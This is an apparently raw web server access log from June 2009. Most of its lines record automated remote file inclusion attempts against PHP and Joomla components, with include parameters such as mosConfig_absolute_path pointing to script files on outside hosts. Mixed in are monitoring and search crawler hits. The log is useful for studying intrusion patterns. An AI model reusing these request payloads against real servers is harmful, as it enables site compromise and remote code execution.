121.78.82.142 - - [21/Jun/2009:04:48:06 -0400] "GET /logs/access_log.Q109052200/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:48:07 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:48:23 -0400] "GET /logs/access_log.Q109053000%20%20//include/admin.lib.inc.php?site_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:49:16 -0400] "GET /logs/access_log.Q109051300/bbs///?_zb_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:04:49:20 -0400] "GET //index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:04:49:20 -0400] "GET /logs/error_log.Q109051900//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:04:49:20 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:49:29 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:04:49:39 -0400] "GET /logs/access_log.Q109051900//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:50:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:50:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:50:20 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:50:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.188.254.4 - - [21/Jun/2009:04:50:26 -0400] "GET /logs/access_log.Q109061800//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:50:40 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 261 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:50:40 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 288 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:50:40 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 266 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:50:46 -0400] "GET /skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:50:46 -0400] "GET /logs/access_log.Q109052200/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:50:46 -0400] "GET /logs/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:50:50 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 288 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:51:01 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:51:09 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:51:23 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:51:24 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:51:24 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:51:26 -0400] "GET /logs/access_log.Q109052200%20%20/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:51:57 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:52:11 -0400] "GET /logs/access_log.Q109052400%20%20/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:52:57 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:52:57 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:52:57 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:53:50 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:54:02 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:54:49 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:54:50 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:54:50 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:55:00 -0400] "GET /logs/access_log.Q109052200%20%20/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:55:04 -0400] "GET /logs/access_log.Q109061100%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 290 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:55:37 -0400] "GET //skin/zero_vote/error.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:55:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [21/Jun/2009:04:55:41 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:55:41 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:55:54 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:04:56:05 -0400] "GET /logs/access_log.Q109052400%20%20/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:56:44 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:56:45 -0400] "GET /logs/access_log.Q109061800%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:56:51 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:56:51 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:56:51 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:56:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:56:51 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:56:52 -0400] "GET /logs/access_log.Q109060600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:56:53 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:56:53 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:56:53 -0400] "GET /logs/access_log.Q109060600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:57:02 -0400] "GET /logs/access_log.Q109060600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:57:02 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:57:02 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:57:09 -0400] "GET /logs/access_log.Q109052700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:04:57:10 -0400] "GET /logs/access_log.Q109020200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.201.208.50 - - [21/Jun/2009:04:57:15 -0400] "GET /logs/access_log.Q109052700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:58:40 -0400] "GET /logs/access_log.Q109060600%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:58:55 -0400] "GET /logs/access_log.Q109061400%20%20//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:58:59 -0400] "GET /logs/access_log.Q109052700%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:59:21 -0400] "GET /logs/access_log.Q109052800%20%20//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:04:59:45 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:00:15 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:00:19 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:00:24 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:05:00:29 -0400] "GET /logs/access_log.Q109052700/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:00:33 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:00:47 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:01:06 -0400] "GET /logs/access_log.Q109051500%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:01:22 -0400] "GET /logs/access_log.Q109052700%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:05:01:50 -0400] "GET /logs/error_log.Q109052700/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:02:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [21/Jun/2009:05:03:45 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:05:04:46 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:05:04:47 -0400] "GET //galeria.php?start=0&kategoria=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:05:04:47 -0400] "GET /logs//galeria.php?start=0&kategoria=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:05:05:08 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
121.78.82.142 - - [21/Jun/2009:05:05:46 -0400] "GET /logs/access_log.Q109052400/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:05:55 -0400] "GET /logs/access_log.Q109052300//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:06:23 -0400] "GET /logs/error_log.Q109051900%20%20//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:06:23 -0400] "GET /logs//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:06:23 -0400] "GET //index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:06:40 -0400] "GET /logs/error_log.Q109051900//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:06:46 -0400] "GET /logs/access_log.Q109051900//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:07:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [21/Jun/2009:05:08:22 -0400] "GET /images/over-index3_trephine.jpg HTTP/1.1" 200 3150 "-" "Googlebot-Image/1.0"
84.201.208.50 - - [21/Jun/2009:05:08:33 -0400] "GET /logs/access_log.Q109052800//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:09:32 -0400] "GET //index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:09:32 -0400] "GET /logs/error_log.Q109051900//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:09:32 -0400] "GET /logs//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:09:50 -0400] "GET /logs/access_log.Q109051900//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:05:09:53 -0400] "GET /logs/access_log.Q109031800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.36 - - [21/Jun/2009:05:11:18 -0400] "GET //index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:11:19 -0400] "GET /logs//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:11:19 -0400] "GET /logs/access_log.Q109051800//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:11:21 -0400] "GET /logs/error_log.Q109061000//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:05:11:46 -0400] "GET //index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:05:11:46 -0400] "GET /logs//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:05:11:46 -0400] "GET /logs/access_log.Q109051800//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:05:11:57 -0400] "GET /logs/error_log.Q109061000//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:05:12:49 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT HTTP/1.1" 200 37996 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [21/Jun/2009:05:13:02 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:05:13:05 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:13:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.147.72.145 - - [21/Jun/2009:05:14:52 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:05:14:59 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:15:09 -0400] "GET /logs/access_log.Q109051800//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:15:09 -0400] "GET /logs//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:15:09 -0400] "GET /logs/error_log.Q109061000//index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:05:15:15 -0400] "GET //index.php?rootdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.158.150.180 - - [21/Jun/2009:05:16:13 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.158.150.180 - - [21/Jun/2009:05:16:13 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.158.150.180 - - [21/Jun/2009:05:16:13 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:05:16:57 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:05:16:57 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:05:16:57 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:17:12 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:17:12 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:17:12 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
